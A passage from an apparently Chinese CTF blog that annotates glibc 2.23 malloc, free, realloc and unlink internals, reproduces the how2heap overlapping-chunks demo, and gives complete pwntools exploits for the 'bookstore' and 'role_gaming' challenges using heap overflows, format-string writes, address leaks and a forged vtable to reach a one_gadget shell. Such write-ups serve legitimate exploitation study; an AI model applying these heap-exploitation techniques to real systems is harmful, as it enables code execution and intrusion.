        • 是:表示该 bin 中没有空闲 chunk, binmap 中的相应位设置不准确(接着找),将 binmap 的相应 bit 位清零, 获取当前 bin 下一个 bin,将 bit 移到下一个 bit位,回到前面循环↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
        • 否:当前 bin 中的最后一个 chunk 满足要求
          • 重复之前打※※处操作
      • 嵌套循环结尾↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
    • use_top:
      • 前面的全部都没找到则直接使用topchunk,获取topchunk的size
      • 如果size>=nb+MINSIZE(两边都按unsigned long比较),则切出victim(此时不更改last_remainder),chunk2mem,返回victim
      • 如果top_chunk都不满足,判断此时是否有fastchunk
        • 有:调用malloc_consolidate,并计算nb对应bin的index
        • 没有:重复之前调用sysmalloc的流程
    • ###########################################################################

Free就从封装函数开始吧

__libc_free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Public free() entry point (glibc excerpt).
 * Order of handling as visible below: the __free_hook if one is installed,
 * a NULL pointer (no-op), mmapped chunks (released with munmap_chunk), and
 * finally the regular path through _int_free on the chunk's arena.
 */
void
__libc_free (void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */

void (*hook) (void *, const void *) = atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
(*hook)(mem, RETURN_ADDRESS (0)); // if a hook is installed it is called first, same as in the other entry points
return;
}

if (mem == 0) /* free(0) has no effect; a null pointer simply returns */
return;

p = mem2chunk (mem);

if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
/* see if the dynamic brk/mmap threshold needs adjusting */
if (!mp_.no_dyn_threshold
&& p->size > mp_.mmap_threshold
&& p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
{
mp_.mmap_threshold = chunksize (p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk (p);// chunks obtained via mmap are released with munmap; _int_free is not called (not explored further here)
return;
}
// the ordinary free path
ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}

_int_free (mstate av, mchunkptr p, int have_lock)

这里have_lock默认传入的是0

  • 先获取p的chunksize size,然后开始做检查
  • 检查1:p不能大于-size,p需要对齐,否则free(): invalid pointer报错结束
  • 检查2:size要大于MINSIZE,而且size要对齐,否则free(): invalid size报错结束

#下面的三个大块是if..else if..else…结构

  • 通过get_max_fast ()获取global_max_fast变量判断是否为fastchunk,是则进行以下操作(如果存在宏TRIM_FASTBINS,靠近topchunk的fastbin不会进入该流程)
    • 检查该chunk相邻的前向chunk的大小是否合法(是否满足2*size_t < size < system_mem)
      • 不合法则free(): invalid next size (fast)报错结束
    • set_fastchunks(av),设置av中对应标识,代表此时有fastchunk了
    • 将bin链上已存在的chunk赋值到old,检查old是否和本chunk相等
      • 相等则double free or corruption (fasttop)报错结束
    • p->fd = old2 = old;加入bin链,并存下old2为后续表头操作
    • 接下来在有锁(have_lock=1)的条件下,保证表头指向的chunk所属的bin链与当前chunk所属的bin链相同
      • 不相同则invalid fastbin entry (free)报错结束
  • 这里,如果不是mmap分配的chunk则进行以下操作

    • 先加锁(free里面的锁操作好像很多)

    • 根据p和size计算nextchunk

    • 如果p是top_chunk则double free or corruption (top)报错结束

    • 如果nextchunk 的地址已经超过了 top chunk 的结束地址,超过了当前分配区的结束地址,double free or corruption (out)报错结束

    • 如果nextchunk的prev_inuse为0,又因为此时不是fastchunk。double free or corruption (!prev)报错结束

    • 获取nextchunk的nextsize,如果nextsize不满足2*size_t < nextsize < system_mem,则free(): invalid next size (normal)报错结束(这一步在前面fastbin中也做了)

    • 接着向后合并:

      • if (!prev_inuse(p)) {//通过prev_inuse判断如果相邻的后向chunk不在使用态
              prevsize = p->prev_size;//通过本chunk的prev_size段获取prevsize
              size += prevsize;
              p = chunk_at_offset(p, -((long) prevsize));//更新p到prevchunk
              unlink(av, p, bck, fwd);//对prevchunk进行unlink
            }//此处prev_size字段为0会怎么样?prev_size为负数会怎么样?修改偏移来实现任意unlink?
        <!--1-->
      • 检查unsortedbin中表头指针是否正常,不正常则free(): corrupted unsorted chunks报错结束

      • 如果size属于largebin,则将fd_nextsize,bk_nextsize置零

      • 将p加入unsortedbin头并设置size字段prev_inuse为1,并设置相邻前向chunk的prev_size为size

      • 直接链入topchunk,设置size字段prev_inuse为1

    • 如果当前分配区为主分配区,并且 top chunk 的大小大于 heap 的收缩阈值,调用 systrim()函数收缩 heap,不是主分配区的话,调用 heap_trim()函数收缩非主分配区的 sub_heap

  • 这里说明是mmap分配的区域,调用munmap

_int_realloc之前先做检查,如果传入的指针为NULL,就直接调用_int_malloc

如果传入的chunk满足(uintptr_t) oldp > (uintptr_t) -oldsize,或者没有对齐(x64下为16字节对齐),则报错结束

_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize, INTERNAL_SIZE_T nb)

检查oldp的size字段是否满足2*size_t < oldp.size < system_mem,不满足则报错结束

oldchunk不能是mmapped,否则报错结束

通过oldp和oldsize计算next和next size

检查next的size字段是否满足2*size_t < next.size < system_mem,不满足则报错结束

(下面开始if..else..流程)

  • oldsize>=nb?
    • 则准备从原chunk切割
    • newp=oldp,newsize=oldsize
  • :(newsize=oldsize+nextsize)
    • 如果前向chunk是topchunk且oldsize+topsize>nb+MINSIZE
      • 直接从topchunk切割出一部分补上去,设置新tophead,chunk2mem(oldp),完成退出
    • 如果前向chunk不是topchunk且未使用,并满足oldsize+nextsize>nb+MINSIZE
      • newp=oldp
      • unlink前向chunk
    • 前面两种情况都不是,则进行以下操作
      • 调用_int_malloc(av, nb - MALLOC_ALIGN_MASK),分配内存,这里nb - MALLOC_ALIGN_MASK是因为在_int_malloc里面还会再计算一遍nb。然后计算newp和newsize
      • newp == next?
        • 直接设置newp=oldp,不用复制内容了,扩充就好
        • 拷贝内容到新chunk
        • _int_free(av,oldp,1)

检查newsize是否>=nb,不满足则报错结束

计算remainder_size = newsize - nb

  • remainder_size<MINSIZE?
    • 直接设置头部,不用分割了
    • 分割出remainder,并设置其prev_inuse为1,接着调用_int_free(av,remainder,1)

返回chunk2mem,完成退出

unlink

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/*
 * unlink (glibc macro, shown here in function-like form): removes chunk P from
 * its doubly linked bin list, using BK and FD as scratch variables. Each
 * consistency check below aborts through malloc_printerr when it fails.
 */
unlink(AV, P, BK, FD)// P is the pointer to this chunk
{
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
malloc_printerr ("corrupted size vs. prev_size");
// checks that this chunk's size equals the next chunk's prev_size field; this rules out fast chunks

FD = P->fd;//P+0x10
BK = P->bk;//P+0x18; FD and BK point to the forward chunk and the back chunk respectively

if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) //pass check
malloc_printerr ("corrupted double-linked list");
// checks that the forward chunk's bk and the back chunk's fd both equal P
else
{
FD->bk = BK;//0x6020b8+0x18=0x6020d0(small_ptr)=0x6020c0(big_ptr)
BK->fd = FD;// the actual list removal: 0x6020c0+0x10=0x6020d0(small_ptr)=0x6020b8(...)

if (!in_smallbin_range (chunksize_nomask (P))&&
__builtin_expect (P->fd_nextsize != NULL, 0))// the list is a large bin and fd_nextsize is not NULL
{
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
malloc_printerr ("corrupted double-linked list (not small)");
// checks that fd_nextsize->bk_nextsize and bk_nextsize->fd_nextsize both equal P

/* FD is not yet on the nextsize list: it takes over P's position there. */
if (FD->fd_nextsize == NULL)
{
if (P->fd_nextsize == P) FD->fd_nextsize = FD->bk_nextsize = FD;
else
{
FD->fd_nextsize = P->fd_nextsize;
FD->bk_nextsize = P->bk_nextsize;
P->fd_nextsize->bk_nextsize = FD;
P->bk_nextsize->fd_nextsize = FD;
}
}
else
{
/* FD already is on the nextsize list: simply splice P out of it. */
P->fd_nextsize->bk_nextsize = P->bk_nextsize;
P->bk_nextsize->fd_nextsize = P->fd_nextsize;
}
}
}
}

how2heap - overlapping_chunks&bookstore,night-deamonic-heap

ubuntu16.04 libc2.23

overlapping_chunks.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
/*
A simple tale of overlapping chunk.
This technique is taken from
http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/*
 * Overlapping-chunks demo (variant 1).
 *
 * Allocates p1, p2 and p3, frees p2, then overwrites the size field of the
 * freed p2 with 0x181 and requests 0x180-8 bytes. The returned p4 is expected
 * to span p3 as well, which the memset/print sequence at the end illustrates.
 * The write before p2 is an intentional emulation of a heap overflow.
 */
int main(int argc , char* argv[]){


intptr_t *p1,*p2,*p3,*p4;

fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "\nThis is a simple chunks overlapping problem\n\n");
fprintf(stderr, "Let's start to allocate 3 chunks on the heap\n");

p1 = malloc(0x100 - 8);
p2 = malloc(0x100 - 8);
p3 = malloc(0x80 - 8);

fprintf(stderr, "The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3);

/* Fill each chunk with a distinct digit so overlaps show up in the %s dumps below. */
memset(p1, '1', 0x100 - 8);
memset(p2, '2', 0x100 - 8);
memset(p3, '3', 0x80 - 8);

fprintf(stderr, "\nNow let's free the chunk p2\n");
free(p2);
fprintf(stderr, "The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");

fprintf(stderr, "Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n");
fprintf(stderr, "For a toy program, the value of the last 3 bits is unimportant;"
" however, it is best to maintain the stability of the heap.\n");
fprintf(stderr, "To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse),"
" to assure that p1 is not mistaken for a free chunk.\n");

/* Forged chunk size 0x180 with the low bit set, and the matching request size. */
int evil_chunk_size = 0x181;
int evil_region_size = 0x180 - 8;
fprintf(stderr, "We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n",
evil_chunk_size, evil_region_size);

*(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2

fprintf(stderr, "\nNow let's allocate another chunk with a size equal to the data\n"
"size of the chunk p2 injected size\n");
fprintf(stderr, "This malloc will be served from the previously freed chunk that\n"
"is parked in the unsorted bin which size has been modified by us\n");
p4 = malloc(evil_region_size);

fprintf(stderr, "\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size);
fprintf(stderr, "p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x80-8);
fprintf(stderr, "p4 should overlap with p3, in this case p4 includes all p3.\n");

fprintf(stderr, "\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3,"
" and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n");

fprintf(stderr, "Let's run through an example. Right now, we have:\n");
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);

/* Write through p4, then through p3, dumping both after each step. */
fprintf(stderr, "\nIf we memset(p4, '4', %d), we have:\n", evil_region_size);
memset(p4, '4', evil_region_size);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);

fprintf(stderr, "\nAnd if we then memset(p3, '3', 80), we have:\n");
memset(p3, '3', 80);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
}

一个比较简单的overflow的示例

首先申请了3个chunk

0x100(p1)
0x100(p2)
0x80(p3)

当我们把0x100的chunk放入unsortedbin之后,模拟p1 overflow修改p2的size为0x180,再通过malloc(0x180-8)即可直接卸下unsortedbin中这个fake 0x180的chunk,达到overlap p3的目的

由于比较简单这里就没放debug的过程,直接开始撸题吧2333

bookstore

程序分析

程序比较简单

上来先malloc了三个0x90的small chunk

堆上的内容此时是这样的

order1 order2 malloc_dest
0x90 0x90 0x90

下面就是一个循环+switch的结构,循环由v4控制,v4为1后结束循环

1581675282813

结束循环之后存在格式化字符串漏洞,fmt为malloc_dest

edit

1581675013218

无长度检查,存在overflow,在输入的末尾\n处会改成\x00

free

1581675079810

free就是单纯的free,没有清零指针

submit

就是用order1和order2的内容来填充submit_chunk

Exploit

程序的chunk是一开始就malloc好的,无法自己malloc,但是能自己free,当选择5之后可以malloc一个0x150大小的chunk,所以第一思路肯定是free chunk2后通过chunk1更改chunk2的size,然后申请submit_chunk时会返回chunk2的地址,由于submit_chunk比较大,会和malloc_dest形成overlapping,通过修改submit_chunk的内容,溢出到malloc_dest触发格式化字符串漏洞(这里选择时的s可以输入一个比较大的buffer,可以在buffer中填上指针来修改内容)。

因为overlap之后的拷贝操作是先把chunk1的内容拷贝到chunk2,然后再把chunk2的内容加到chunk2后面,所以要计算偏移,具体计算如上图注释,想要malloc_dest刚好放置我们的格式化串我们只需要满足chunk1中有0x74个Byte的内容即可

可是我找了一会之后发现,因为只能用一次格式化字符串,而且在之前也无法泄露,栈指针和libc都利用不了,只能用程序里面的,要么是GOT表,要么是其他可写的段,当然在这里我很自然的联想到了.fini_array段,这个段存放的是程序结束之后要调用的函数指针,我可以修改它为main函数地址(不过只能利用一次),然后在修改.fini_array段的时候顺带把栈地址、libc地址一并泄露(只要到程序栈上找到就行)

1
2
3
4
5
6
7
# Stage 1: free order 2, then overflow from order 1 into its chunk header.
delete(2)

payload1=(('%'+str(0xA39)+'c%13$hn|%19$p|%31$p').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
# The 0x6011B8 passed to submit() below ends up in the %13$hn slot; %19$p is a
# stack address, %31$p is the return address into __libc_start_main, and 0xA39
# is the low part of main's address.
edit(1,payload1)# overflow that rewrites the size field

submit(0x6011B8)# the address rides along with the menu choice; the chunk malloc'ed now overlaps

然后计算对应地址

1
2
3
# Parse the two values printed by %19$p and %31$p in the stage-1 format string.
ret_stack=int(p.recv(14),16)-0x18#stack address of ret
# The second value may still carry a '|' separator, hence the strip.
libc_base=int(p.recv(15).strip('|'),16)-0x20830
one=0x45216+libc_base#one_gadget

之后第二次利用与第一次相同,但是有一点,one_gadget的地址可能与第二次执行的返回地址有3个Byte不一样,那怎么办?所以第二次我们可以修改两次(为什么不是三次是因为三个字节的大小顺序可能会不一样,在使用%hhn写入的时候前面的输出会对后面产生影响,但是如果一次改两个字节%hn和一次改一个字节%hhn就可以控制顺序了)

1
2
3
# change1: low 16 bits of the one_gadget address (written with %hn).
change1=one&0xffff
# change2: bits 16..23 of the address (written with %hhn).
change2=one&0xff0000
change2=change2>>16

printf时我们写入的地址在栈上的偏移需要自己计算一下,地址也需要计算一下,因为此时的栈已经变了,不过偏移是固定的

1
2
3
4
5
6
# Stage 2: same overflow as stage 1, this time rewriting the return address.
delete(2)

# Prints change2 characters, writes one byte through %14$hhn, then pads up to
# change1 characters in total and writes two bytes through %13$hn.
payload1=(('%0'+str(change2)+'d%14$hhn|%0'+str(change1-change2-1)+'d%13$hn|').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
edit(1,payload1)

submit(ret_stack-0x110,ret_stack-0x110+2)# pass both target addresses along with submit

最终getshell

完整Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Target setup: start ./books locally with ASLR enabled and PTYs on stdin/stdout.
binary = './books' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack helpers that pad short reads to the full word width.
# (Template leftovers: my_u64, my_u32, ub_offset and codebase are not used by
# the rest of this script.)
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def edit(x,content):
    """Pick menu entry `x` and send `content` as the order text.

    Waits for the end of the menu ('5: Submit') before sending the choice and
    for the ' order:' prompt before sending the text.
    """
    menu_choice = str(x)
    p.recvuntil('5: Submit\n')
    p.sendline(menu_choice)
    p.recvuntil(' order:\n')
    p.sendline(content)

def delete(x):
    """Free an order: sends menu choice '3' when x == 1, otherwise '4'."""
    p.recvuntil('5: Submit\n')
    p.sendline('3' if x == 1 else '4')
def submit(address,address2=0):
    """Send the submit choice followed by two packed 64-bit addresses.

    0x35 is ASCII '5' (the Submit entry); packed as a 64-bit word it is followed
    by NUL bytes, and the two addresses are sent in the same input line.
    """
    p.recvuntil('5: Submit\n')
    request = p64(0x35)
    request = request + p64(address)
    request = request + p64(address2)
    p.sendline(request)

# ---- Stage 1: redirect 0x6011B8 to main and leak stack/libc addresses ----
delete(2)

# Format string padded to 0x74 bytes, NUL-padded to 0x88, then '\x50\x01'
# (0x150) overflows into the next chunk's size field.
payload1=(('%'+str(0xA39)+'c%13$hn|%19$p|%31$p').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
edit(1,payload1)

submit(0x6011B8)

# Skip five '|' delimiters before parsing the two leaked pointers.
p.recvuntil('|')
p.recvuntil('|')
p.recvuntil('|')
p.recvuntil('|')
p.recvuntil('|')
ret_stack=int(p.recv(14),16)-0x18
libc_base=int(p.recv(15).strip('|'),16)-0x20830
log.info("\033[1;36m" +'ret_stack:'+hex(ret_stack)+'\nlibc_base:'+hex(libc_base)+ "\033[0m")
one=0x45216+libc_base

# Split the one_gadget address: low 16 bits (change1) and bits 16..23 (change2).
change1=one&0xffff
change2=one&0xff0000
change2=change2>>16
log.info("\033[1;36m" +'one_gadget:'+hex(one)+"\033[0m")
log.info("\033[1;36m" +'change1:'+hex(change1)+'\nchange2:'+hex(change2)+ "\033[0m")

# ---- Stage 2: overwrite the return address with the one_gadget ----
delete(2)

# NOTE(review): the second pad width is change1-change2-1, which is only a
# valid width when change1 > change2+1.
payload1=(('%0'+str(change2)+'d%14$hhn|%0'+str(change1-change2-1)+'d%13$hn|').ljust(0x74,'a')).ljust(0x88,'\x00')+'\x50\x01'
edit(1,payload1)

# First address receives the %13$hn write, the second (+2) the %14$hhn write.
submit(ret_stack-0x110,ret_stack-0x110+2)

p.interactive()

role_gaming

程序分析

因为第一次在pwn里面写到c++的程序,本来c++也不太好逆,就…稍微写的有点久?(以后逆向速度要加油~)

main

初始化:申请了一个0xA0(0xB0)大小的chunk,用来保存后面的指针

下面主要就是从栈上读取一个command,用来操作游戏,大小是0xFFF,会在输入结尾处改成0

new

1581908110687

最多允许new 0x13个character,其中character有两种类型:barbarian,wizzard,在C++里面来说就是,barbarian和wizard类从character继承而来。
申请barbarian的command格式为:“new barbarian ”+personnage,wizzard的格式为“new wizzard ”+personnage

每次创建前都会调用get_personnage,这个函数会调用strncmp判断command中的personnage和所有character对应chunk中的personnage,其中判断时的n用的是存在chunk上的那个记录,如果有重复的personnage,会直接申请失败

对比完之后开始创建character,其对应的chunk如下:
character:new 0xF8(0x100)
personnage:calloc 0x??(由输入决定)

barbarian:

wizzard:

两者的初始化基本都差不多,除了Vtable和一些值可能存在不同

delete

通过搜索personnage判断是否存在character
如果存在

  • free personnage,并将character chunk上的指针置零
  • delete character_ptr,并在对应记录上赋值为前一个character,character数量减一

help

1581910298728

打印帮助信息

change

格式为”change “+oldpersonnage+” “+newpersonnage

如果旧personnage长度大于新的,就直接strncpy到对应chunk去,如果小于则需要realloc

调用到对应类的虚函数来输出其内容

漏洞分析

(以后碰到复杂的题一定要先写漏洞分析)

chunks&内存操作

chunk:

  1. 初始用来存储的chunk,0xA0(0xB0)大小,new出来的chunk(new是调用malloc来实现的)
  2. character chunk,0xf8(0x100)大小,calloc出来的chunk
  3. personnage chunk,大小由我们控制,不过不能为0因为程序会自动加上一个’B’或者’W’,calloc出来的chunk,内存上申请时挨着character chunk

内存操作:

除了上面申请内存的地方还有释放内存时是先free(personnage),然后delete character chunk。在change里面还有一个realloc personnage

漏洞点:

初始化时,处理输入的personnage会先调用strlen计算len,然后calloc(len,1),接着存len+1在对应记录上
接着用strncpy(chunkptr + 1,ptr, len)从chunk的第2个字节处开始放置字符串

此处存在1Byte overflow

在change处,由于记录的len是加过1的,当我们输入的新personnage长度和记录长度相等时,也可以修改到后面一个字节

前面分析的时候顺带画了一个图方便自己看:

1581995268256

Exploit

exploit就也是堆上比较常见的构造了,这里我使用的方法是先用free modified chunk来leak内容,然后用malloc modified chunk来覆盖Vtable,具体为什么见下文

最开始的时候我申请了3个barbarian(a,b,c),此时如果使用a的overflow可以修改到b记录chunk的size低一字节,因为申请a的时候产生的overflow在topchunk上,所以不用管,主要是利用change时的overflow

0x100 0x20 0x100 0x?? 0x100 0x??
chunk for overflow
a a b b c c

然后我看到后面的chunk刚好大小可以设置在一个字节,所以就想能不能利用一个0x70的来fastbin attack,通过free overlap修改其fd,然而我当时没有考虑到的是,我们的chunk大小申请是通过输入的personnage长度来决定的,如果想使用修改fd来fastbin attack,当我改到fd时,这个chunk的size也被破坏了,因为0字节在初始化时就被截断了,根本无法实现,但是如果通过这个方法来extend a,从而达到泄露指针内容的话还是可以的。

我就先随便申请了5个barbarian(因为之前一直在构造的时候都畏手畏脚的,这次干脆先稍微弄多一点,冗余也没事,能在限制下写出来就行XD

0x100 0x20 0x100 0x60 0x100 0x60 0x100 0x60 0x100 0x60
a a b b c c d d e e

然后就是想办法在b所处的0x160这个范围内放上libc地址和heap地址,可以通过先free d,再free b来在fastbin上放上fd,不过这个leak值得注意的是,只能leak fd和同fd一样在堆上地址结尾是8的这一行数据,因为如果填充foot,后面紧跟的就是size,只能通过刚好盖满一个chunk的size,realloc时让chunk shrink 0x10个字节,刚好把fd放在前一个chunk的foot处,此时就可以leak了

当然free d之后,由于d的记录chunk在unsortedbin上,再free b的话就会让b的记录chunk fd指向d的记录chunk,而不是main_arena了,所以free d之后我又申请了一个f,如下:

0x100 0x20 0x100 0x60 0x100 0x60 0x100 0x60 0x100 0x60 0x20
fb1
a a b b c c f e e f

再free b之后在b两个chunk的fd上就既有libc地址又有heap地址了,接下来的操作就只是修改和输出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Heap grooming: five barbarians a..e (per the write-up, each is a 0x100 record
# chunk followed by its name chunk).
new('a'*0x18)
new('b'*0x50)
new('c'*0x50)
new('d'*0x50)
new('e'*0x50)

# Free d, then allocate f before freeing b (see the write-up for the bin layout).
delete('B'+'d'*0x50)
new('f'*0x18)


# One-byte overflow through change(): presumably the '\x01' that ends a's stored
# name is the low size byte of b's record chunk, rewritten here to 0x61.
change('B'+'a'*0x17+'\x01','a'*0x18+'\x61')
delete('B'+'b'*0x50)

### extend a to get libc_base
change('a'*0x18+'\x61','A'*0x20)

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('A'*0x20)
libc_base=my_u64(p.recv(6))-0x3c4b78
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")


#### extend a to get heap_base
change('A'*0x20,'*'*(0x40+0xe0)+'\xff')#low 1 byte don't care for piebase

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('\xff')
# Only 5 bytes follow the overwritten low byte, so shift them back into place.
heap_base=(my_u64(p.recv(5))<<8)-0x12500
log.info("\033[1;36m" + 'heap_base:'+hex(heap_base) + "\033[0m")

leak之后,因为fastbin attack实现不了,所以我卡了很久,最后随便翻了一下别人的思路,知道了在堆上修改vtable这种操作,但是想要覆盖到下一个chunk去修改vtable,用前面free modified chunk的方法,我在记录chunk根本找不到合适的作为fakesize的字段,只有一个字节的overflow当然也不允许我们修改过多,于是决定试试malloc modified chunk

前面用来leak的构造我就没管了,直接在后面新开一块出来用于覆盖vtable,接着我就申请了g、h、以及一个伪造vtable的i,i的personnage块上我填了一个one_gadget的值,毕竟输入6个字节的地址还是可以的

0x100 0x60 0x20 0x100 0x30 0x100 0x30 0x100 0x20
one_gadget
e e f g g h h i i

先free掉g,然后利用f修改g的size为0x150,再change h为0x140+p64(fake vtable)即可malloc到g+h前面0x18字节的chunk,刚好可以修改h的vtable,这里其实我发现前面的构造也不一定要申请f,直接change一个说不定就可以了

修改之后print all即可调用

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Target setup: start ./role_gaming locally with ASLR enabled and PTYs on stdin/stdout.
binary = './role_gaming' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack helpers that pad short reads to the full word width; my_u64 is used
# below to decode the 6- and 5-byte pointer leaks.
# (Template leftovers: my_u32, ub_offset and codebase are not used by this script.)
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def new(name):
    """Create a barbarian called `name` once the '>' prompt appears."""
    command = 'new barbarian '+name
    p.recvuntil('>')
    p.sendline(command)

def delete(name):
    """Delete the character called `name` once the '>' prompt appears."""
    command = 'delete '+name
    p.recvuntil('>')
    p.sendline(command)

def change(nameo,namen):
    """Rename character `nameo` to `namen` once the '>' prompt appears."""
    command = 'change '+nameo+' '+namen
    p.recvuntil('>')
    p.sendline(command)

# Heap grooming: five barbarians a..e (per the write-up, each is a 0x100 record
# chunk followed by its name chunk).
new('a'*0x18)
new('b'*0x50)
new('c'*0x50)
new('d'*0x50)
new('e'*0x50)

# Free d, then allocate f before freeing b (see the write-up for the bin layout).
delete('B'+'d'*0x50)
new('f'*0x18)


# One-byte overflow through change(): presumably the '\x01' that ends a's stored
# name is the low size byte of b's record chunk, rewritten here to 0x61.
change('B'+'a'*0x17+'\x01','a'*0x18+'\x61')
delete('B'+'b'*0x50)

### extend a to get libc_base
change('a'*0x18+'\x61','A'*0x20)

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('A'*0x20)
libc_base=my_u64(p.recv(6))-0x3c4b78
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")


#### extend a to get heap_base
change('A'*0x20,'*'*(0x40+0xe0)+'\xff')

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('\xff')
# Only 5 bytes follow the overwritten low byte, so shift them back into place.
heap_base=(my_u64(p.recv(5))<<8)-0x12500
log.info("\033[1;36m" + 'heap_base:'+hex(heap_base) + "\033[0m")
#### candidate one_gadget offsets (kept for reference; 0xf02a4 is the one used below)
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
'''
# Second layout for the vtable overwrite: g, h, and a third character whose
# name carries the one_gadget address (it serves as the fake vtable entry).
new('g'*0x30)
new('h'*0x30)
new('xxxxxxx'+p64(libc_base+0xf02a4))
# NOTE(review): g was created with 0x30 'g's but is deleted with 0x50 — per the
# write-up names are compared with strncmp over the stored length; confirm.
delete('B'+'g'*0x50)

# Same one-byte overflow as above, now from f: low size byte 0x01 -> 0x51.
change('B'+'f'*0x17+'\x01','F'*0x18+'\x51')
# Renaming h to a 0x148-byte name ending in the fake vtable pointer.
change('B'+'h'*0x30,'+'*0x140+p64(heap_base+0x12b28))
# 'print all' goes through the virtual call that now uses the forged vtable.
p.sendline('print all')

p.interactive()

how2heap - poison_null_byte&plaiddb

ubuntu16.04 libc2.23

poison_null_byte.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>


/*
 * Poison-null-byte demonstration (glibc built without tcache).
 *
 * Chunks a, b, c and a barrier are allocated. b is freed, then a single NUL
